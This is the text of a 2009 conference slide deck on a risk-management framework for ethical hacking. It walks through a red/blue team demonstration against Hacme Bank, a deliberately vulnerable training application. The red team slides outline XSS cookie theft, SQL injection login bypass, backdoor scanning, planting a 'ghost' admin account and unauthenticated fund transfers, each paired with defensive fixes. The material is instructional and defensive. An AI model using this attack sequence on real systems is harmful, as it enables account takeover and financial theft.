09/16/2009 © Kris Kahn, 2009

Inverting RiskManagement forEthical Hacking

SecureWorld Expo ‘09

© Kris Kahn, 200909/16/2009 2

Agenda

Speaker Introductions Learning Objectives Framework of Risk Management & Analysis (FoRMA) Duality of Risk Demonstration of Information Warfare Scenario Wrap-Up Q&A

© Kris Kahn, 200909/16/2009 3

Introductions

Speaker Kris Kahn, CISSP, CISA, CGEIT, OPSA

Senior Staff, Electronic Security Governance

Seagate Technology LLC

Co-Speaker Brian Shura, PCI-QSA

Director of Penetration Testing

AppSec Consulting

© Kris Kahn, 200909/16/2009 4

Audience

Attendees should be involved with penetration testing or managing risks, such as... IT Security Staff

Risk Managers

Company Officers

Ethical Hackers

Recommended knowledge... Familiar with Security Best Practices

Understand Risk Management Concepts

Experience with Penetration Testing

© Kris Kahn, 200909/16/2009 5

Learning Objectives

Understand the advantage of validating your security measures through ethical hacking

Recognize the benefits of applying Risk Management and Risk Exploitation methods

Understand your control options to mitigate risks

Balance your enterprise security using FoRMA

09/16/2009 © Kris Kahn, 2009

FoRMA Overview

© Kris Kahn, 200909/16/2009 7

Benefits of FoRMA

Big Picture Holistic relationship of related security models.

Technology Independent Universal Risk Management concepts.

Business Focused Minimize risk, instead of maximizing security.

© Kris Kahn, 200909/16/2009 8

Overview

A Framework for integrating industry standard models, such as CIA*, STRIDE* and others

Addresses Risk and Control elements: Risk

Threat Vulnerability

Control Technology Process

*: See references at the end of the presentation material

© Kris Kahn, 200909/16/2009 9

Goal of FoRMA: Risk Mitigation

– I.e. Control risks within acceptable limits to support business objectives

Establish Your Boundaries Define relevant policies, standards and best-practices Protect assets and resources in accordance with policy Detect policy violations Assure policy compliance

© Kris Kahn, 200909/16/2009 10

Building your foundation

Start from the ground level and work your way up!

Construct a strong security foundation to build your security policies, standards and best-practices. Use industry established security methodologies and codes of best practice to guide your standards and practices.

A security foundation supports all layers (including physical, network, application, etc), and addresses each security implementation phase (Awareness, Protection, Detection, and Assurance).

© Kris Kahn, 200909/16/2009 11

Building your foundation

Use Methodology with Sub-Model to evaluate Subject

*: See references at the end of the presentation material

Methodology Model Subject

Threat Management

STRIDE* Threat

Security Architecture

APAIN* Technology

Security Management

RIVET* Process

Asset/Resource Management

CIA* Vulnerability

© Kris Kahn, 200909/16/2009 12

Building your foundation

This is a layered model based on the ISO Protocol model* which identifies five (of the original seven) layers where critical assets and resources can be identified.

DataApplication

SystemNetworkPhysical

Identify, Analyze, Control, Maintain, repeat. This process life cycle will guide you through the framework to the

appropriate security resolution.

© Kris Kahn, 200909/16/2009 13

Risk Mitigation Life Cycle

Analyze

Maintain

Control

ThreatAssessment

VulnerabilityAssessment

AssessedRisk

ThreatMitigation

VulnerabilityReduction

Source Target

ControlledRisk

ManagedRisk

Result

ThreatManagement

AssetManagement

Identify ThreatDiscovery

AssetValuation

BusinessSurvey

© Kris Kahn, 200909/16/2009 14

Risk Mitigation Life Cycle: Identify

Risks can be received through many input channels, if due to a security incident, the threat source needs to be identified to help guide the remediation. Inactive threats from untrusted sources should also be discovered.

Valuating the business importance of the asset will drive the prioritization of the remedation.

Identify

Maintain

Control

Analyze

ThreatDiscovery

AssetValuation

BusinessSurvey

© Kris Kahn, 200909/16/2009 15

Risk Mitigation Cycle: Analyze

To determine the risk, you must understand the threat of attack and the vulnerability of the asset or resource. We measure and analyze these items in detail to determine the corresponding risk.

Analyze ThreatAssessment

VulnerabilityAssessment

AssessedRisk

Maintain

Control

Identify

© Kris Kahn, 200909/16/2009 16

Risk Mitigation Life Cycle: Control

Once you have assessed the risk, you can apply control-mechanisms in the form of technology to mitigate the threat or reduce the vulnerability.

Control ThreatMitigation

VulnerabilityReduction

ControlledRisk

Maintain

Analyze

Identify

© Kris Kahn, 200909/16/2009 17

Risk Mitigation Life Cycle: Maintain

Once a system is live, you apply counter-measures in the form of processes in the event of an attack (Incident Response) or to assure the integrity of the technology (Security Assessments).

Implement change control and regular audit processes to verify when an aspect of the formula has changed.

Maintain ManagedRisk

ThreatManagement

Asset/ResourceManagement

Control

Analyze

Identify

© Kris Kahn, 200909/16/2009 18

Vulnerability

Technology

Process

ThreatAwareness Protection

DetectionAssurance

FoRMA Model Overview

Risk Control

© Kris Kahn, 200909/16/2009 19

Implementation: Phases

Awareness Protection

DetectionAssurance

1 2

34

© Kris Kahn, 200909/16/2009 20

Risk Mitigation Phases & Life Cycle

IACM IACM

IACM IACM

Awareness Protection

DetectionAssurance

09/16/2009 © Kris Kahn, 2009

Duality of Risk

© Kris Kahn, 200909/16/2009 22

Risk Prevention vs Risk Exploitation

Using opposing Objectives, the model can be used strategically to take advantage of vulnerabilities instead of preventing damage.

Analyze

Control

Maintain

Identify Reconnaissance

Evaluate Risks

Exploit Risks

Risk/Control Divergence

Discover

Evaluate Risks

Mitigate Risks

Balance Risk/Control

© Kris Kahn, 200909/16/2009 23

Risk Analysis Strategies

The Blue Team’s strategy is create a balance by mitigating the risk by applying the appropriate amount of control. The remaining risk is acknowledged, regularly checked and managed.

Risk = Control (+/- acceptable residual control/risk)

The Red Team’s strategy is to subvert the control and leverage the risk, keeping the scales tipped in their favor.

Risk > Control

Both teams need to analyze the risks and the controls to be able to execute their strategies.

© Kris Kahn, 200909/16/2009 24

FoRMA Model for Ethical Hacking

Vulnerabilities

Technology

Process

ThreatsAwareness Protection

DetectionAssurance

Deception Intrusion

EvasionCorruption

Red TeamStrategy

Blue TeamStrategy

© Kris Kahn, 2009http://www.cybernetix.com/forma

© Kris Kahn, 200909/16/2009 25

Risk Exploitation Phases & Life Cycle

Deception Intrusion

EvasionCorruption

IACM IACM

IACM IACM

09/16/2009 © Kris Kahn, 2009

Information Warfare Scenario:

Red Team/Blue Team

Demonstration

Business Become profitable by offering banking services on-line Validate security controls through third-party Pen Test

Blue Team - Operations Support the business by identifying and reducing risk

Red Team - Ethical Hackers Exploit weaknesses to gain access to customer data,

administrative functions, and financial transactions

© Kris Kahn, 200909/16/2009 27

Objectives

Red Team1. Deception2. Intrusion3. Evasion4. Corruption

© Kris Kahn, 200909/16/2009 28

Penetration and Defense Life-Cycles

Blue Team1. Awareness2. Protection3. Detection4. Assurance

Background:The business selected a Windows system running an IIS web server as their online customer interface to their WebService-based banking system and their back-end database system (MS SQL Server).

© Kris Kahn, 200909/16/2009

Target

Free Penetration Testing platform

29

Hacme Bank simulates a "real-world" web services-enabled online banking application, which was built with a number of known and common vulnerabilities.

© Kris Kahn, 200909/16/2009 30

Red Team: Phase 1

I: Target Web Server

A: Manual JavaScript vulnerability test on Web-based forum

C: Cross-Site Scripting (XSS) code to steal admin cookie and reuse

M: Elevate privileges of own account to admin status

Deception Intrusion

EvasionCorruption

IACM

© Kris Kahn, 200909/16/2009

Analyze

Enter into forum to test:

Result:

Conclusion: Vulnerability exists to allow XSS attack that may

lead to Elevation of Privileges (Admin access)

31

Risk Level:

High

© Kris Kahn, 200909/16/2009

Control & Maintain XSS code to steal and reuse cookie to gain access:

Maintain: Set attacker account privilege to Admin type

32

Risk Level:

High

© Kris Kahn, 200909/16/2009 33

Blue Team: Phase 1

I: Focus on accounts and authorized access

A: Validate user accounts and appropriate privileges

C: Repair access/accounts as necessary

M: Improve coding practices

Awareness Protection

DetectionAssurance

IACM

© Kris Kahn, 200909/16/2009

Analyze

Validate Accounts through Database

Conclusion: Admin privileges inappropriate for user account,

may be due to error, root cause analysis in progress

Remove unauthorized admin privileges for user account

34

Risk Level:

High

© Kris Kahn, 200909/16/2009

Control & Maintain Find XSS attack in forum and cleanup:

Maintain: Patch to prevent special characters entered in

forum using input validation, improve coding practices to anticipate this vulnerability

35

Risk Level:

Low

© Kris Kahn, 200909/16/2009 36

Red Team: Phase 2

I: Target data flow

A: Test for SQL injection vulnerabilities

C: Exploit SQL injection flaws to bypass authentication and access admin account

M: Gather sensitive information from back-end database

Deception Intrusion

EvasionCorruption

IACM

© Kris Kahn, 200909/16/2009

Analyze

Perform manual test to use single quote (') to verify if a field is vulnerable to SQL Injection

Conclusion: SQL injection is possible and may lead to Elevation

of Privileges (Admin access)

37

Risk Level:

Medium

© Kris Kahn, 200909/16/2009

Control

Use SQL injection attack on password field

38

Risk Level:

High

Successfully bypassed the authentication logic

© Kris Kahn, 200909/16/2009

Control

39

Risk Level:

High

Leverage admin function to gather additional data

© Kris Kahn, 200909/16/2009

Maintain

40

Risk Level:

High

© Kris Kahn, 200909/16/2009 41

Blue Team: Phase 2

I: Focus on database server SQL activity

A: Assess potential unauthorized access to back-end database through application

C: Install web application firewall for SQL injection protection

M: Update application code to use parameterized queries to prevent SQL injection

Awareness Protection

DetectionAssurance

IACM

© Kris Kahn, 200909/16/2009

Analyze

Unauthorized SQL activity discovered

Conclusion: Unauthorized access to database through

application exposed user records with passwords

42

Risk Level:

High

© Kris Kahn, 200909/16/2009

Control & Maintain

Install WebKnight to mitigate risk of SQL injection attacks

Maintain: Update application code to use parameterized

queries to prevent SQL injection

Encrypt passwords in database

43

Risk Level:

Low

© Kris Kahn, 200909/16/2009 44

Red Team: Phase 3

I: Target hidden directories and files

A: Evade detection from using attack signatures and scan for application backdoors

C: Access the test admin functionality without authenticating

M: Create ghost account for system owner

Deception Intrusion

EvasionCorruption

IACM

© Kris Kahn, 200909/16/2009

Analyze Use SensePost Wikto to identify backdoors

Conclusion: Back-door may lead to admin functionality

45

Risk Level:

Medium

© Kris Kahn, 200909/16/2009

Control & Maintain Exploit discovered development access to admin

functionality

Maintain: Create “ghost” account similar to owner’s name

46

Risk Level:

High

© Kris Kahn, 200909/16/2009 47

Blue Team: Phase 3

I: Focus on web activity

A: Review logs for problems or malicious activity

C: Cleanup production environment and disable ghost account

M: Prevent external access to all admin functionality and only access admin functions locally

Awareness Protection

DetectionAssurance

IACM

© Kris Kahn, 200909/16/2009

Analyze Web Server log files, increased file size and activity

Conclusion: Web server scanning discovered a back-door

exposing admin functionality (again)

48

Risk Level:

High

© Kris Kahn, 200909/16/2009

Control & Maintain Remove development back-door and “ghost” account Maintain:

Prevent unauthorized access to admin tools use WebKnight to filter on the URL

49

Risk Level:

Low

© Kris Kahn, 200909/16/2009

Maintain

...and retain local admin functionality

50

Risk Level:

Low

© Kris Kahn, 200909/16/2009 51

Red Team: Phase 4

I: Identify other opportunities to access back-end data by reviewing details of previous error messages

A: Test access to XML forms

C: Use WebService to transfer funds

M: Re-enable attacker account

Deception Intrusion

EvasionCorruption

IACM

© Kris Kahn, 200909/16/2009

Analyze Identify other non-application opportunities to access the

data (captured previously)

52

Risk Level:

Low

© Kris Kahn, 200909/16/2009

Analyze Test available methods

Conclusion: Lookup by userID method is not restricted

53

Risk Level:

Medium

© Kris Kahn, 200909/16/2009

Control Use the soapUI tool to generate a request

54

Risk Level:

Medium

© Kris Kahn, 200909/16/2009

Control

Acquire account number using the GetUserAccounts method

55

Risk Level:

Medium

© Kris Kahn, 200909/16/2009

Control

Determine system owner’s account balance

56

Risk Level:

Medium

© Kris Kahn, 200909/16/2009

Control & Maintain

Transfer funds

Maintain: Use WebService to re-enable attacker account

57

Risk Level:

High

© Kris Kahn, 200909/16/2009 58

Blue Team: Phase 4

I: Focus on transaction activity

A: Identify significant banking activity and look for errors

C: Correct unauthorized account transfers, remove offending account

M: Implement authorization between the web application and the WebService

Awareness Protection

DetectionAssurance

IACM

© Kris Kahn, 200909/16/2009

Analyze Identify significant banking activity and account balance discrepancy

Conclusion: Internal WebService exposed externally is allowing

unauthorized and unauthenticated access

59

Risk Level:

High

© Kris Kahn, 200909/16/2009

Control & Maintain

Audit of all account activity and reverse unauthorized transactions.

Implement manual approval control for large on-line transfers.

Restrict the WebService to internal IP addresses only.

Maintain: Implement authentication between the calling

application (HackMe Bank) and the web service.

60

Risk Level:

Low

09/16/2009 © Kris Kahn, 2009

Wrap-Up

61

© Kris Kahn, 200909/16/2009 62

Wrap-Up

Design security controls with attacker perspective in mind (and visa-versa).

Be proactive in the implementation of phased controls.

Validate your controls through Ethical Hacking to ensure effectiveness.

Balance your enterprise security using a risk-based framework (FoRMA) that is focused on supporting business objectives.

© Kris Kahn, 200909/16/2009 63

Questions?

Feedback & Comments are welcome

Contact information: Kris.Kahn@mac.com

831-419-1256

© Kris Kahn, 200909/16/2009

Tools (downloadable, non-commercial)

Foundstone HacmeBank http://www.foundstone.com/us/resources/proddesc/

hacmebank.htm

Paros http://www.parosproxy.org/

SensePost Wikto http://www.sensepost.com/research/wikto/

SoapUI http://www.soapui.org/

SQL Express Profiler http://code.google.com/p/sqlexpressprofiler/downloads/list

WebKnight http://aqtronix.com/?PageID=99

64

© Kris Kahn, 200909/16/2009 65

References (*)

• Control Objectives for IT and Related Technology (COBIT) trademarked by the IT Governance Institute (ITGI)

• Open System Interconnection (OSI) reference model was developed by the International Organization for Standardization (ISO) in 1984, and it is now considered the primary architectural model for intercomputer communications.

• STRIDE Threat Model, conceived, built upon, and evangelized at Microsoft by Loren Hohnfelder, Praerit Garg, Jason Garms, and Michael Howard. Explained further in “Writing Secure Code, 2nd Ed” (ISBN 0-7356-1722-8), pages 83-86.

• CIA Security Model, author unknown, taught as part of the Common Body of Knowledge for CISSP curriculum.

• APAIN Acronym for Security Architecture, developed by Curtis Coleman in 2001.• RIVET Acronym for Security Management, developed by Kris Kahn 2004.• Failure Mode and Effects Analysis (FMEA) evolved as a process tool used by the

United States military as early as 1949 and is currently part of the SixSigma curriculum.

• Capability Maturity Model (CMM) is a trademark of Carnegie Mellon University.